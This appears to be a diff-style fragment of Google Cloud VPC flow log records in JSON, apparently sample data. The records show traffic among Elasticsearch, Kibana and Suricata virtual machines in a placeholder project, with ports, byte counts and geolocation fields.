project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4y","jsonPayload":{"bytes_sent":"755901","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60112},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"227","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4o","jsonPayload":{"bytes_sent":"248715","connection":{"dest_ip":"67.43.156.13","dest_port":33558,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.394676451Z","packets_sent":"270","reporter":"SRC","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5g","jsonPayload":{"bytes_sent":"69757","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65316},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"709","reporter":"DEST","rtt_msec":"86","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho59","jsonPayload":{"bytes_sent":"69440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65263},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"728","reporter":"DEST","rtt_msec":"87","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho57","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":50438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5e","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.168.2.117","dest_port":50438,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4d","jsonPayload":{"bytes_sent":"2395","connection":{"dest_ip":"192.168.2.165","dest_port":59623,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"11","reporter":"SRC","rtt_msec":"233","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5y","jsonPayload":{"bytes_sent":"60335","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.538257098Z","packets_sent":"353","reporter":"DEST","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-p
roject","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho6a","jsonPayload":{"bytes_sent":"65565","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"354","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4v","jsonPayload":{"bytes_sent":"70174","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65271},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"717","reporter":"DEST","rtt_msec":"89","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"bnj3cofh3cdk1","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34178},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdjx","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33602},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdju","jsonPayload":{"bytes_sent":"66736","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"366","reporter":"DEST","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwor
k_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjz","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":33602,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkk","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":52454},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdk0","jsonPayload":{"bytes_sent":"259510","connection":{"dest_ip":"10.87.40.76","dest_port":33534,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"251","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdk8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":52260,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkp","jsonPayload":{"bytes_sent":"65069","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name
":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkc","jsonPayload":{"bytes_sent":"60530","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"366","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdkm","jsonPayload":{"bytes_sent":"11384","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"86","reporter":"DEST","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdjy","jsonPayload":{"bytes_sent":"272063","connection":{"dest_ip":"67.43.156.13","dest_port":33554,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"247","reporter":"SRC","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdjv","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"67.43.156.13","dest_port":53706,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"SRC","rtt_msec":"43","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkh","jsonPayload":{"bytes_sent":"18295","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789039435Z","packets_sent":"118","reporter":"DEST","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkg","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33064},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdk7","jsonPayload":{"bytes_sent":"165290","connection":{"dest_ip":"10.87.40.76","dest_port":33556,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"251","reporter":"DEST","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdk9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53706},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"DEST","rtt_msec":"43","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":52260},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdki","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34090,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkd","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34178,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
